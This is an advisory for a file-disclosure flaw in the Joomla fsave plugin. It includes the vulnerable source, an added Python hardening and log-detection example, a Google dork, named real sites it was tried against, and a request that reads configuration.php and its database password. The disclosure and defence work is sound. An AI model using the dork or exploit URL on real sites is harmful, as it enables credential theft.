Joomla Fsave 2.0 Local File Disclosure
Posted on 20 January 2016
Joomla <= (fsave Plugin) Local File Disclosure Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author   : KnocKout
[~] Contact  : knockout@e-mail.com.tr
[~] Skype    : knockoutr@msn.com
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com
[~] Greetz   : b3mb4m, ZoRLu, Sen Haxor, Ne0-h4ck3r, KedAns-Dz ( milw00rm.com )
===================================================================
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App.         : Joomla
|~Plugin           : fsave
|~Affected Version : 2.0
|~Software         : N/A
|~RISK             : High
|~Google Dork      : inurl:plugins/content/fsave/
===================================================================
======================Info=========================================
download.php in the fsave plugin builds the path it serves by concatenating
JPATH_BASE (the Joomla root) with the GET parameter "filename" and then
passes the result straight to readfile(). There is no authentication check,
no whitelist of downloadable files and no filtering of "../", so any file
the web server process can read can be downloaded by an unauthenticated
visitor. Requesting Joomla's own "configuration.php" is enough: it holds
the database host, user name and password in clear text.
============ Error line's in download.php ===========================
<?php
define('JPATH_BASE', dirname(dirname(dirname(dirname(__FILE__)))));
// $_GET['filename'] is used unvalidated: no whitelist, no "../" filtering,
// no check that the result stays inside an intended download directory.
$file = JPATH_BASE."/".$_GET['filename'];
header('Content-Description: File Transfer');
header("Content-type: application/octet-stream");
header("Content-disposition: attachment; filename=".basename($file));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header("Content-Length: " . filesize($file));
ob_clean();
flush();
readfile($file);   // serves whatever path the visitor asked for
?>
======================================================================
======================== Tested on Demos ============================
http://www.gedore.pl
http://www.gedore.com.pl
http://www.rhodius.pl
http://rhodius.com.pl
http://loesomat.pl
http://carolus.com.pl
http://klann.pl
=======================================================================
========================= Exploitation ==================
http://[TARGET]/plugins/content/fsave/download.php?filename=configuration.php
=======================================================================
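The following is an added example, not code from the advisory or from the fsave plugin. It reproduces the unsafe path construction from download.php in Python, puts a hardened resolver next to it (canonicalise with realpath, then require the result to stay below one download directory), and runs a simple detection rule over constructed web server log lines. The directory name "fsave_downloads", the demo file tree and the log lines are assumptions made for illustration; the real plugin may lay out its files differently.

```python
"""Added example: why fsave download.php is an arbitrary file read, how a
hardened resolver rejects the same inputs, and how to spot abuse in logs.
The directory layout, the download directory name `fsave_downloads` and the
sample log lines are constructed for this example (assumptions, not facts
about the real plugin)."""
import os
import tempfile
from urllib.parse import urlparse, parse_qs


def vulnerable_path(jpath_base: str, filename: str) -> str:
    # Mirrors `$file = JPATH_BASE."/".$_GET['filename'];` from download.php:
    # plain string concatenation, no validation at all.
    return jpath_base + "/" + filename


def safe_path(jpath_base: str, download_dir: str, filename: str):
    """Hardened resolver: only regular files below <jpath_base>/<download_dir>
    may be served. Returns the canonical path, or None to refuse the request."""
    if not filename or "\x00" in filename:
        return None
    base = os.path.realpath(os.path.join(jpath_base, download_dir))
    # Resolve symlinks and '..' BEFORE comparing, so 'x/../../y' cannot escape.
    # An absolute filename makes os.path.join discard base, which the
    # commonpath check below catches as well.
    candidate = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def build_demo_site() -> str:
    """Create a throwaway Joomla-like tree (assumed layout): configuration.php
    at the root and one legitimate file in the assumed download directory."""
    root = tempfile.mkdtemp(prefix="joomla-")
    with open(os.path.join(root, "configuration.php"), "w") as f:
        f.write("<?php class JConfig { public $password = 'dbsecret'; } ?>\n")
    os.makedirs(os.path.join(root, "fsave_downloads"))
    with open(os.path.join(root, "fsave_downloads", "brochure.pdf"), "wb") as f:
        f.write(b"%PDF-1.4 demo\n")
    return root


def read_via_vulnerable(root: str, filename: str) -> bytes:
    # What the original download.php effectively does: readfile($file).
    with open(vulnerable_path(root, filename), "rb") as f:
        return f.read()


# Detection side. Constructed Apache-style access log lines: one legitimate
# download, two reads outside the download directory, one unrelated request.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [20/Jan/2016:10:01:02 +0000] "GET /plugins/content/fsave/download.php?filename=fsave_downloads/brochure.pdf HTTP/1.1" 200 512
203.0.113.7 - - [20/Jan/2016:10:01:09 +0000] "GET /plugins/content/fsave/download.php?filename=configuration.php HTTP/1.1" 200 3101
203.0.113.7 - - [20/Jan/2016:10:01:15 +0000] "GET /plugins/content/fsave/download.php?filename=..%2F..%2F..%2F..%2Fetc/passwd HTTP/1.1" 200 2001
203.0.113.9 - - [20/Jan/2016:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 9000
"""


def suspicious_fsave_requests(log_text: str, download_dir: str = "fsave_downloads") -> list:
    """Return the (URL-decoded) filename values of fsave download requests whose
    normalised path does not stay inside download_dir."""
    hits = []
    for line in log_text.splitlines():
        try:
            request = line.split('"')[1]          # 'GET <path> HTTP/1.1'
            path = request.split(" ")[1]
        except IndexError:
            continue
        url = urlparse(path)
        if not url.path.endswith("/plugins/content/fsave/download.php"):
            continue
        for name in parse_qs(url.query).get("filename", []):   # percent-decoded
            # Anchor at '/' so leading '..' segments collapse instead of surviving.
            normalized = os.path.normpath("/" + name).lstrip("/")
            if not normalized.startswith(download_dir + "/"):
                hits.append(name)
    return hits


if __name__ == "__main__":
    site = build_demo_site()
    print(read_via_vulnerable(site, "configuration.php"))      # leaks the DB password
    print(safe_path(site, "fsave_downloads", "../configuration.php"))  # None
    print(suspicious_fsave_requests(SAMPLE_ACCESS_LOG))
```

The resolver deliberately canonicalises first and compares second: a check such as `strpos($filename, '..') === false` on the raw string would still let a symlink inside the download directory point elsewhere, and an absolute path or a `%2e%2e` encoding could slip past a naive filter. The log rule flags any filename whose normalised form leaves the download directory, which catches both the direct `configuration.php` read from the advisory and traversal variants.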